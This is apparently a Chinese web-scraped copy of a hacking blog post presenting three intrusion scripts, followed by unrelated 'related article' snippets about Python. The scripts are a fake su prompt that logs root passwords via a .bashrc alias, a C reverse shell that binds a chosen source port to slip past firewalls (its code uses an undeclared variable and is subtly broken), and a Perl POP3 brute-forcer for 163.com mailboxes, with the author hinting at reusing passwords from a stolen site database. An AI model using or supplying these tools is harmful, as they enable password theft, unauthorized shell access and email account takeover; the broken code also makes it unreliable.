python入侵个人电脑的步骤图解台式_入侵渗透专用的python小脚本脚本安全 -电脑资料...
渗透的很多时候,在网上找到的工具并不适用,自己写代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评,
0×01
记录root密码小工具:
root.py
01#!/usr/bin/python
02importos, sys, getpass, time
03
04current_time=time.strftime("%Y-%m-%d %H:%M")
05logfile="/dev/shm/.su.log"//密码获取后记录在这里
06#CentOS
07#fail_str = "su: incorrect password"
08#Ubuntu
09#fail_str = "su: Authentication failure"
10#For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样
11fail_str="su: incorrect password"
12try:
13passwd=getpass.getpass(prompt='Password: ');
14file=open(logfile,'a')
15file.write("[%s]t%s"%(passwd, current_time))//截取root密码
16file.write('n')
17file.close()
18except:
19pass
20time.sleep(1)
21printfail_str//打印切换root失败提示
渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本
0×02
设置源端口反弹shell
渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,
Ping了下百度 可以ping通,
那真相只有一个
服务器变态的限制了只能某些提供已某些端口为源端口去连接外面
比如
只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。
谷歌程序无果,自己查了相关api后写了个。
client-port.c
01#include
02#include
03#include
04#include
05#include
06voiderror(char*msg)
07{
08perror(msg);
09exit(0);
10}
11intmain(intargc,char*argv[])
12{
13intsockfd, portno, lportno,n;
14structsockaddr_in serv_addr;
15structsockaddr_in client_addr;
16structhostent *server;
17charbuffer[256];
18if(argc < 3) {
19fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]);
20exit(0);
21}//三个参数,目标主机,目标主机端口,本地源端口
22portno =atoi(argv[2]);
23sockfd = socket(AF_INET, SOCK_STREAM, 0);
24if(sockfd < 0)
25error("ERROR opening socket");
26
27
28bzero((char*) &client_addr,sizeof(client_addr));
29lportno =atoi(argv[3]);
30client_addr.sin_family = AF_INET;
31client_addr.sin_addr.s_addr = INADDR_ANY;
32client_addr.sin_port = htons(lportno);//设置源端口
33if(bind(sockfd, (structsockaddr *) &client_addr,
34sizeof(client_addr)) < 0)
35error("ERROR on binding");
36
37server = gethostbyname(argv[1]);
38if(server == NULL) {
39fprintf(stderr,"ERROR, no such host ");
40exit(0);
41}
42bzero((char*) &serv_addr,sizeof(serv_addr));
43serv_addr.sin_family = AF_INET;
44bcopy((char*)server->h_addr,
45(char*)&serv_addr.sin_addr.s_addr,
46server->h_length);
47serv_addr.sin_port = htons(portno);
48if(connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0)//连接
49error("ERROR connecting");
50dup2(fd, 0);
51dup2(fd, 1);
52dup2(fd, 2);
53execl("/bin/sh","sh -i", NULL);//执行shell
54close(fd);
55}
用法:
1gcc client-port.c -o port
1chmod +x port
1./port 你的IP 你的监听端口 本地的源端口
如 ./port http://www.myhack58.com 80 80
成功反弹shell 提权成功
0×03邮箱爆破脚本
某个时候 需要爆破一批邮箱
Burp163.pl
01#!/usr/bin/perl
02useNet::POP3;
03$email="pop.163.com"; //设置pop服务器地址 163为pop.163.com
04$pop= Net::POP3->new($email)ordie("ERROR: Unable to initiate. ");
05print$pop->banner();
06$pop->quit;
07$i=0;
08open(fp1,"user.txt");
09@array1=;
10open(fp2,"pass.txt");
11@array2=; //从文件中获取邮箱用户名及密码
12foreach$a(@array1) {
13$u=substr($a,0,length($a)-1);
14$u=$u."@163.com";
15foreach$b(@array2) {
16$p=substr($b,0,length($b)-1);
17print"cracked with ".$u."-----".$p."n";
18$i=$i+1;
19$pop= Net::POP3->new($email)ordie("ERROR: Unable to initiate. ");
20$m=$pop->login($u,$p); //尝试登录邮箱
21if($m>0)
22{
23print$u."------------".$p."----"."success"."n";
24$pop->quit;
25} //成功登录
26else
27{
28print$u."------------".$p."----"."failed"."n";
29$pop->quit; //登录失败
30}
31}
32}
33print$i;
用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱
1$email="pop.163.com";
再将去除掉@后面部分的邮箱地址比如sude@163.com 去除后sude存进去
同目录user.txt中吗,再将字典存进去pass.txt
你会说
这个有点鸡肋吧 万一邮箱的密码很复杂
呵呵
搞到了一个小站的数据,
用这个程序批量测试密码是否就是邮箱密码 呵呵
我啥都没说,入侵渗透专用的python小脚本脚本安全》(https://www.unjs.com)。
0×04
这三个程序仅供技术研究,如读者用于违法行为,本人概不负
python入侵个人电脑的步骤图解台式_入侵渗透专用的python小脚本脚本安全 -电脑资料...相关推荐
- python官网下载步骤图解-下载及安装Python详细步骤
安装python分三个步骤: *下载python *安装python *检查是否安装成功 1.下载Python (2)选择下载的版本 (3)点开Download后,找到下载文件 Gzipped sou ...
- 在python中使用最小二乘法画出拟合曲线_基于jupyter notebook的python编程-----运用最小二乘法,导入文件数据模拟一元线性回归分析...
基于jupyter notebook的python编程-----运用最小二乘法,导入文件数据模拟一元线性回归分析 用最小二乘法模拟一元线性回去曲线的目录 一.运行jupyter notebook,搭建 ...
- python 去掉list元素的双引号_一天快速入门 Python
Python 是由Guido Van Rossum在 90 年代早期设计,现在是最常用的编程语言之一.特别是人工智能的火热,再加之它的语法简洁且优美,实乃初学者入门AI必备的编程语言. Python基 ...
- python任意代码都可以缩进去_我发现了个 Python 黑魔法,执行任意代码都会自动念上一段 『平安经』...
最近的"平安经"可谓是引起了不小的风波啊. 作为一个正儿八经的程序员,最害怕的就是自己的代码上线出现各种各样的 BUG. 为此,明哥今天分享一个 Python 的黑魔法,教你如何在 ...
- python零基础入门五小时教学_五小时轻松入门Python
Python 是由Guido Van Rossum在 90 年代早期设计,现在是最常用的编程语言之一.特别是人工智能的火热,再加之它的语法简洁且优美,实乃初学者入门AI必备的编程语言. Python基 ...
- python能在ipad上运行吗_如何用iPad运行Python代码?
其实,不只是iPad,手机也可以. 痛点 我组织过几次线下编程工作坊,带着同学们用Python处理数据科学问题. 其中最让人头疼的,就是运行环境的安装. 实事求是地讲,参加工作坊之前,我已经做了认真准 ...
- python分析出nba球员的位置_虎扑热帖|Python数据分析|NBA的球星们喜欢在哪个位置出手...
原标题:虎扑热帖|Python数据分析|NBA的球星们喜欢在哪个位置出手 前言 1. 这篇数据分析案例,我做了个视频版本,对代码做了解读,讲了运行的注意事项和一些有的没的,供需.对于视频制作还不是很有 ...
- python可以处理多大的数据_科多大数据之Python基础教程之Excel处理库openpyxl详解...
原标题:科多大数据之Python基础教程之Excel处理库openpyxl详解 科多大数据小课堂来啦~Python基础教程之Excel处理库openpyxl详解 openpyxl是一个第三方库,可以处 ...
- python两数相加有进退位_仁裁者、Python之父Guido“退位”,python何去何从?
10月30日,Python之父Guido大牛宣布退休,离开Dropbox.他发推文说,"这件事感觉既苦涩又甜蜜:苦涩的是,我马上要离开Dropbox,现在已经退休:甜蜜的是,在Dropbox ...
- python的开发者太负责任了_人生苦短,我用 Python
我接触 Python 并不算早,第一次使用 Python 写生产系统的程序是2004年,那时候我已经有了几年的编程经验.当然了,现在这年头说早晚都不合适,昨天我说2000年就开始使用 Vim 编程了, ...
最新文章
- ubuntu 16.04常用命令
- POJ 2993 Emag eht htiw Em Pleh(模拟)
- 【机器人】关于驱动器与控制器的工作机制
- Activiti流程定义部署、删除
- 铺管家教育:拼多多如何提升星级
- Statement 和 PreparedStatement之间的关系和区别
- #2.生活小妙招-实现没有加速选项的视频加速操作
- 瀚高数据库并行导入导出
- idea下的新建的index.jsp访问不到404
- 粉丝看了教程成功发文章了,恭喜一下,并说下近期计划
- 看完这篇,黑苹果驱动VoodooI2C编译打包所有错误全搞定
- RabbitMQ高可用集群搭建
- 我的第一篇文章——stm32的ADC+DMA+滤波算法
- DBeaver中的常用快捷键和自定义快捷键方式
- 磁盘清理软件:DaisyDisk for Mac
- 模运算性质-mod (ACM学习笔记)
- java EE 我的成长感悟
- 手机号 imsi tmsi_你好,我借的网贷忘了叫什么名字了怎么办,手机号也没用了,怎么可以查到-免费法律咨询...
- word中仿宋字体显示不清楚的问题
- android简单记事本
热门文章
- 第五版fmea表格_FMEA第五版: 新版 DFMEA六步法解析
- c语言表达式语法问题,C语言表达式的语法图与语法检查
- python 代码命令大全
- mysql 游标创建_Mysql 游标创建
- ezcad旋转轴标刻参数_激光打标机软件ezcad系统参数设置
- 在线教育平台源码组成概述
- 手游游戏源码2000套已测
- 《Python数据分析与数据挖掘实战》第十五章学习——文本分析
- Windows10中安装VMware Workstation Pro 15.x与使用Ubuntu 20.04 LTS
- SSA ERP LN v6.1